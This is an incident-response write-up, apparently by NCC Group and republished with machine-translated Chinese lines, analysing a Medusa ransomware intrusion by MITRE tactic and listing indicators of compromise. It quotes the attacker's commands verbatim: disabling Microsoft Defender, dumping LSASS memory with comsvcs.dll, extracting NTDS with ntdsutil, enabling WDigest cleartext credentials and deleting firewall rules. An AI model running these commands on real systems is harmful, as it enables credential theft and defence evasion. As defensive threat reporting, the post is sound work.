Don’t throw a hissy fit; defend against Medusa

Intro  介绍

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   
我们的技术专家撰写了一个博客系列,重点关注最近在 NCC Group 事件响应活动中观察到的四个勒索软件家族部署的战术、技术和程序 (TTP)。

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa. 
如果您错过了,我们的上一篇文章分析了涉及 D0nut 勒索团伙的事件响应参与。在本期中,我们将更深入地了解美杜莎。

Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 
不要与 MedusaLocker 混淆,Medusa 于 2021 年首次被观察到,是一种勒索软件即服务 (RaaS),通常使用双重勒索方法来获取金钱收益。2023 年,随着“美杜莎博客”的推出,这些团体的活动有所增加。该平台用作泄露属于受害者的数据的工具。

Summary  总结

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  
这篇文章将深入探讨 NCC Group 的网络事件响应团队 (CIRT) 最近处理的涉及 Medusa Ransomware 的事件响应活动。

Below provides a summary of findings which are presented in this blog post: 

  • Use of web shells to maintain access. 
    使用 Web Shell 来维护访问权限。
  • Utilising PowerShell to conduct malicious activity. 
    利用 PowerShell 进行恶意活动。
  • Dumping password hashes.  
  • Disabling antivirus services.  
  • Use of Windows utilises for discovery activities.  
    使用 Windows 用于发现活动。
  • Reverse tunnel for C2. 
    C2 的反向隧道。
  • Data exfiltration.   数据外泄。
  • Deployment of Medusa ransomware. 

Medusa   水母

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.  
美杜莎勒索软件是一种变种,据信自 2021 年 6 月以来就已经存在 [1]。美杜莎是双重勒索勒索软件的一个例子,威胁行为者在其中泄露和加密数据。威胁行为者威胁说,如果不支付赎金,就会在暗网上发布或出售受害者的数据。这意味着美杜莎勒索软件背后的组织可以被描述为出于经济动机。美杜莎勒索软件的受害者来自任何特定行业,这表明该变体背后的组织对伤害任何组织都没有问题。

Incident Overview  事件概述

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  
初始访问权限是通过利用面向外部的 Web 服务器获得的。Webshell 是在服务器上创建的,它使威胁参与者能够访问环境。从最初访问到执行勒索软件,观察到各种各样的活动,例如执行 Base64 编码的 PowerShell 命令、转储密码哈希和禁用防病毒服务。数据被泄露,后来出现在美杜莎泄漏网站上。

Timeline  时间线

T – Initial Access gained via web shells.  
T – 通过 Web shell 获得的初始访问权限。

T+13 days – Execution activity. 
T+13 天 – 执行活动。

T+16 days – Persistence activity. 
T+16 天 – 持久性活动。

T+164 days – Defense Evasion activity. 
T+164 天 – 防御规避活动。

T+172 days – Persistence and Discovery activity. 
T+172 天 – 持久性和发现活动。

T+237 days – Defense Evasion and Credential Access Activity started. 
T+237 天 – 防御规避和凭据访问活动开始。

T+271 days – Ransomware Executed.  
T+271 天 – 勒索软件已执行。

Mitre TTPs  斜接 TTP

Initial Access  初始访问

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  
威胁参与者通过利用由面向外部的 Web 服务器托管的易受攻击的应用程序获得了初始访问权限。部署了 Webshell 以在受害者的环境中站稳脚跟并保持访问。

Execution  执行

PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   
威胁参与者利用 PowerShell 进行各种恶意活动,例如:

  • Downloading executables    下载可执行文件
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
      示例:powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc ...
  • Disabling Microsoft Defender 
    禁用 Microsoft Defender

    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
      示例:powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\\\\SOFTWARE\\\\\Policies\\\\Microsoft\\\\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
  • Deleting executables   删除可执行文件
    • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
      示例:powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
  • Conducting discovery activity  

    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 
      示例:powershell.exe -noninteractive -exec bypass net group domain admins /domain

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’. 
Windows Management Instrumentation (WMI) 用于远程执行 cmd.exe 进程:wmic /node: / user: /password:进程调用创建“cmd.exe”。

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  
计划任务用于执行 c:\\programdata\\a.bat。目前尚不清楚 a.bat 的确切用途,但是,对编译的 ASPX 文件的分析显示,威胁参与者已使用 PowerShell 安装 anydesk.msi。

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi
  • msiExec.exe /i anydesk.msi /qn

cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 
cmd.exe 进程已启动,参数列表如下:c:\\programdata\\a.bat';启动休眠 15;ps AnyDesk微星

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   
威胁参与者安装了各种服务。安装了PDQ Deploy来部署LAdHW.sys,这是一个禁用防病毒服务的内核驱动程序。此外,PSEXESVC.exe 安装在多个服务器上。在一台服务器上,它用于修改防火墙以允许 WMI 连接。

Persistence  坚持

Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>. 
通过在面向外部的 Web 服务器(被认为是初始访问服务器)上创建一个新的用户管理员来实现对受害者网络的访问。此外,在两个面向外部的 Web 服务器上,上传了 Web Shell,以建立持久访问并远程执行命令。基于 JavaScript 的 Web Shell 存在于一台 Web 服务器上,而 GhostWebShell [2] 存在于另一台服务器上。GhostWebShell 是无文件的,但是,其编译版本保存在 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\\\ 中。

Defence Evasion  防御规避

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  
由于使用了各种防御规避技术,逃避检测是该威胁行为者的目标之一。防病毒代理已从所有受影响的主机(包括防病毒服务器)中删除。威胁参与者使用以下方法禁用了 Windows Defender 功能Microsoft:powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;。

Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\”
此外,LAdHW.sys(已签名的内核模式驱动程序)作为新服务安装,以禁用防病毒服务。删除了以下防火墙规则:powershell.exe -Command amp;{Remove-NetFirewallRule -DisplayName \“<防病毒代理防火墙规则名称>\”。

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  
威胁行为者混淆了他们的活动。Base64 编码的 PowerShell 命令用于下载恶意可执行文件。应该注意的是,其中许多可执行文件(如 JAVA64.exe 和 re.exe)在使用后被删除。此外,还执行了装有Themida的Sophos.exe(见下文)。

Don’t throw a hissy fit; defend against Medusa
Figure 1 – Sophos.exe. 
图 1 – Sophos.exe。

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 
HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential 的值已修改为 1,以便登录凭据以明文形式存储。这使威胁参与者能够执行凭据转储活动。

Credential Access  凭据访问

The following credential dumping techniques were utilised by the threat actor:  

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
    使用 Nishang 有效负载转储密码哈希。Nishang 是 PowerShell 脚本和有效负载的集合。使用了需要管理员权限的 Get-PassHashes 脚本。
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
    Mimikatz 存在于一个名为 trust.exe 的面向外部的 Web 服务器上。在 C:\Users\admin\Desktop 中标识了一个名为 m.txt 的文件,该文件与 Mimikatz 可执行文件的位置相同。
  • An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
    LSASS 内存转储是使用内置的 Windows 工具 comsvcs.dll 创建的。

    • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full 
      powershell -exec 绕过 -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png 已满
  • he built-in Windows tool ntdsutil.exe was used to extract the NTDS:  

    • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 
      Powershell NTDSutil.exe 'ac i ntds' 'ifm' '创建完整的 C:\ProgramData\NT' Q Q

Discovery  发现

The threat actor conducted the following discovery activity: 

Type of discovery activity
Description 描述
nltest /trusted_domains Enumerates domain trusts 
net group ‘domain admins’ /domain 
Enumerates domain groups 
net group ‘domain computers’ / domain 
Enumerates domain controllers 
ipconfig /all Learn about network configuration and settings 
tasklist  任务列表 Displays a list of currently running processes on a computer 
quser  QUSER用户 Show currently logged on users 
whoami   Establish which user they were running as 
wmic os get name 
WMIC OS 获取名称
Gathers the name of the operating system 
wmic os get osarchitecture 
Establishes the operating system architecture 

Lateral Movement  横向移动

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 
远程桌面协议 (RDP) 用于在受害者的网络中横向移动。

Command and Control  指挥与控制

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 
反向隧道允许威胁参与者建立从本地主机到远程主机的新连接。二进制 c:\programdata\re.exe 已执行并连接到 134.195.88[.]27 通过端口 80 (HTTP)。威胁行为者倾向于使用通用协议来混合合法流量,在这种情况下可以看出,因为使用了端口 80。

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  
此外,JWrapper 远程访问应用程序安装在各种服务器上,以保持对环境的访问。AnyDesk也被威胁行为者使用。

Exfiltration  外泄

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  

Impact  冲击

The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  
Medusa 勒索软件以 gaze.exe 的形式部署到受害者的网络。文件已加密,并且 .MEDUSA 被追加到文件名中。赎金票据被命名为!!READ_ME_MEDUSA!!!..txt。由于从 Hyper-V 存储中删除了所有 VM 以及本地和云备份,因此系统恢复受到抑制。

Indicators of Compromise 

IOC Value IOC值 Indicator Type 指标类型 Description 
webhook[.]site  webhook[.]网站 Domain   Malicious webhook
bashupload[.]com  bashupload[.].com Domain   Download JAVA64.exe and RW.exe
tmpfiles[.]org  tmpfiles[.]组织 Domain   Download re.exe
134.195.88[.]27:80 IP:PORT  IP:端口 C2
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 SHA256  SHA256的 trust.exe (Mimikatz.exe)
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 SHA256  SHA256的 JAVA_V01.exe
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 SHA256  SHA256的 testy.exe / gmer_th.exe
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 SHA256  SHA256的 JAVA_V02.exe
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6 SHA256  SHA256的 Sophos.exe
C:\Users\Sophos.exe  C:\Users\Sophos.exe File Path  文件路径 Sophos.exe
C:\Users\admin\Desktop\  C:\用户\admin\桌面\ File Path  文件路径 trust.exe JAVA_V01.exe testy.exe gmer_th.exe JAVA_V02.exe
C:\ProgramData\JWrapper-Remote Access\ 
File Path  文件路径 JWrapper files
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<应用程序名称>\\
File Path  文件路径 GhostWebshell compiled files
C:\Windows\PSEXESVC.exe  C:\Windows\PSEXESVC.exe File Path  文件路径 PsExec
File Path  文件路径 Disables AV
File Path  文件路径 PDQDeployRunner – used to deploy LAdHW.sys
C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe 
C:\Users\\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe
File Path  文件路径 Ransomware executable


Tactic 策略 Technique 技术 ID Description  描述
Initial Access  初始访问 Exploit Public-Facing Application 
T1190  T1190型 A vulnerable application hosted by an external facing web server was exploited .  
利用了由面向外部的 Web 服务器托管的易受攻击的应用程序。
Execution   执行 Windows Management Instrumentation T1047  T1047型 WMI used to remotely execute a cmd.exe process.  
WMI 用于远程执行 cmd.exe 进程。
Execution   执行 Scheduled Task/Job: Scheduled Task 
T1053.005  编号:T1053.005 Execute a.bat  执行 .bat
Execution   执行 Command and Scripting Interpreter: PowerShell 
T1059.001  编号:T1059.001 PowerShell was leveraged to execute malicious commands.  
PowerShell 被用于执行恶意命令。
Execution   执行 Software Deployment Tools 
T1072  T1072型 PDQ Deploy was installed to deploy LAdHW.sys. 
安装了 PDQ 部署以部署 LAdHW.sys。
Execution  执行 System Services: Service Execution 
T1569.002  编号:T1569.002 PsExec was installed as a service.  
PsExec 作为服务安装。
Persistence  坚持 Create Account: Domain Account 
T1136.0012  编号:T1136.0012 A new user ‘admin’ was created to maintain access.  
Persistence  坚持 Server Software Component: Web Shell 
服务器软件组件:Web Shell
T1505.003  编号:T1505.003 Web shells were utilised to maintain access.  
Web Shell 用于维护访问。
Defense Evasion  防御规避 Obfuscated Files or Information: Software Packing 
T1027.002  编号:T1027.002 Sophos.exe was packed with Themida. 
Sophos.exe 包含 Themida。
Defense Evasion   防御规避 Indicator Removal: File Deletion 
T1070.004  编号:T1070.004 Malicious executables were deleted after use.   
Defense Evasion  防御规避 Indicator Removal: Clear Persistence 
T1070.009  编号: T1070.009 Malicious executables were deleted after use.   
Defense Evasion  防御规避 Obfuscated Files or Information 
T1027  T1027型 Base64 encoded PowerShell commands were utilised to download malicious executables.  
Base64 编码的 PowerShell 命令用于下载恶意可执行文件。
Defense Evasion   防御规避 Modify Registry  修改注册表 T1112  编号:T1112 The WDigest registry key was modified to enable credential dumping activity. 
WDigest 注册表项已修改为启用凭据转储活动。
Defense Evasion  防御规避 Impair Defenses: Disable or Modify Tools 
T1562.001  编号:T1562.001 Antivirus services were disabled.  
Defense Evasion  防御规避 Impair Defenses: Disable or Modify System Firewall 
T1562.004  编号:T1562.004 Firewall rules were deleted.  
Credential Access  凭据访问 OS Credential Dumping: LSASS Memory 
OS 凭据转储:LSASS 内存
T1003.001  编号: T1003.001 Mimikatz was utilised.  An LSASS memory dump was created.  
使用了 Mimikatz。 已创建 LSASS 内存转储。
Credential Access  凭据访问 OS Credential Dumping: NTDS 
OS 凭据转储:NTDS
T1003.003  编号:T1003.003 Ntdsutil.exe was used to extract the NTDS. 
Ntdsutil.exe 用于提取 NTDS。
Discovery  发现 Domain Trust Discovery 
T1482  编号:T1482 Nltest was used to enumerate domain trusts.  
Nltest 用于枚举域信任。
Discovery  发现 Permission Groups Discovery: Domain Groups 
T1069.002  编号:T1069.002 Net was used to enumerate domain groups. 
Net 用于枚举域组。
Discovery  发现 System Network Configuration Discovery 
T1016  T1016型 Ipconfig was used to learn about network configurations.  
Ipconfig 用于了解网络配置。
Discovery  发现 System Service Discovery 
T1007  T1007型 Tasklist was used to display running processes.  
Discovery  发现 Remote System Discovery 
T1018  T1018型 Net was used to enumerate domain controllers.  
Net 用于枚举域控制器。
Discovery  发现 System Owner/User Discovery 
T1033  T1033型 Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as.  
Quser 用于显示已登录的用户。Whoami 用于确定威胁参与者以哪个用户身份运行。
Discovery  发现 System Information Discovery 
T1082  T1082型 Wmic was used to gather the name of the operating system and its architecture.  
Wmic 用于收集操作系统的名称及其体系结构。
Lateral Movement   横向移动 Remote Services: Remote Desktop Protocol 
T1021.001  编号: T1021.001 RDP was used to laterally move through the environment.  
RDP 用于在环境中横向移动。
Command and Control  指挥与控制 Ingress Tool Transfer 
Ingress 工具转移
T1105  T1105型 PowerShell commands were used to download and execute malicious files.  
PowerShell 命令用于下载和执行恶意文件。
Command and Control  指挥与控制 Remote Access Software 
T1219  编号:T1219 JWrapper and AnyDesk were leveraged. 
JWrapper 和 AnyDesk 被利用。
Command and Control  指挥与控制 Protocol Tunnelling  协议隧道 T1572  T1572型 A reverse tunnel was established.   
Exfiltration   外泄 Exfiltration  外泄 TA0010  编号: TA0010 Data was exfiltrated and published to the leak site.  
Impact   冲击 Data Encrypted for Impact 
T1486  T1486型 Medusa ransomware was deployed. 
Impact  冲击 Inhibit System Recovery 
T1490  T1490型 VMs from the Hyper-V storage and local and cloud backups were deleted.  
删除了 Hyper-V 存储以及本地和云备份中的 VM。

References  引用




原文始发于Molly DewisDon’t throw a hissy fit; defend against Medusa

版权声明:admin 发表于 2023年11月15日 上午12:00。
转载请注明:Don’t throw a hissy fit; defend against Medusa | CTF导航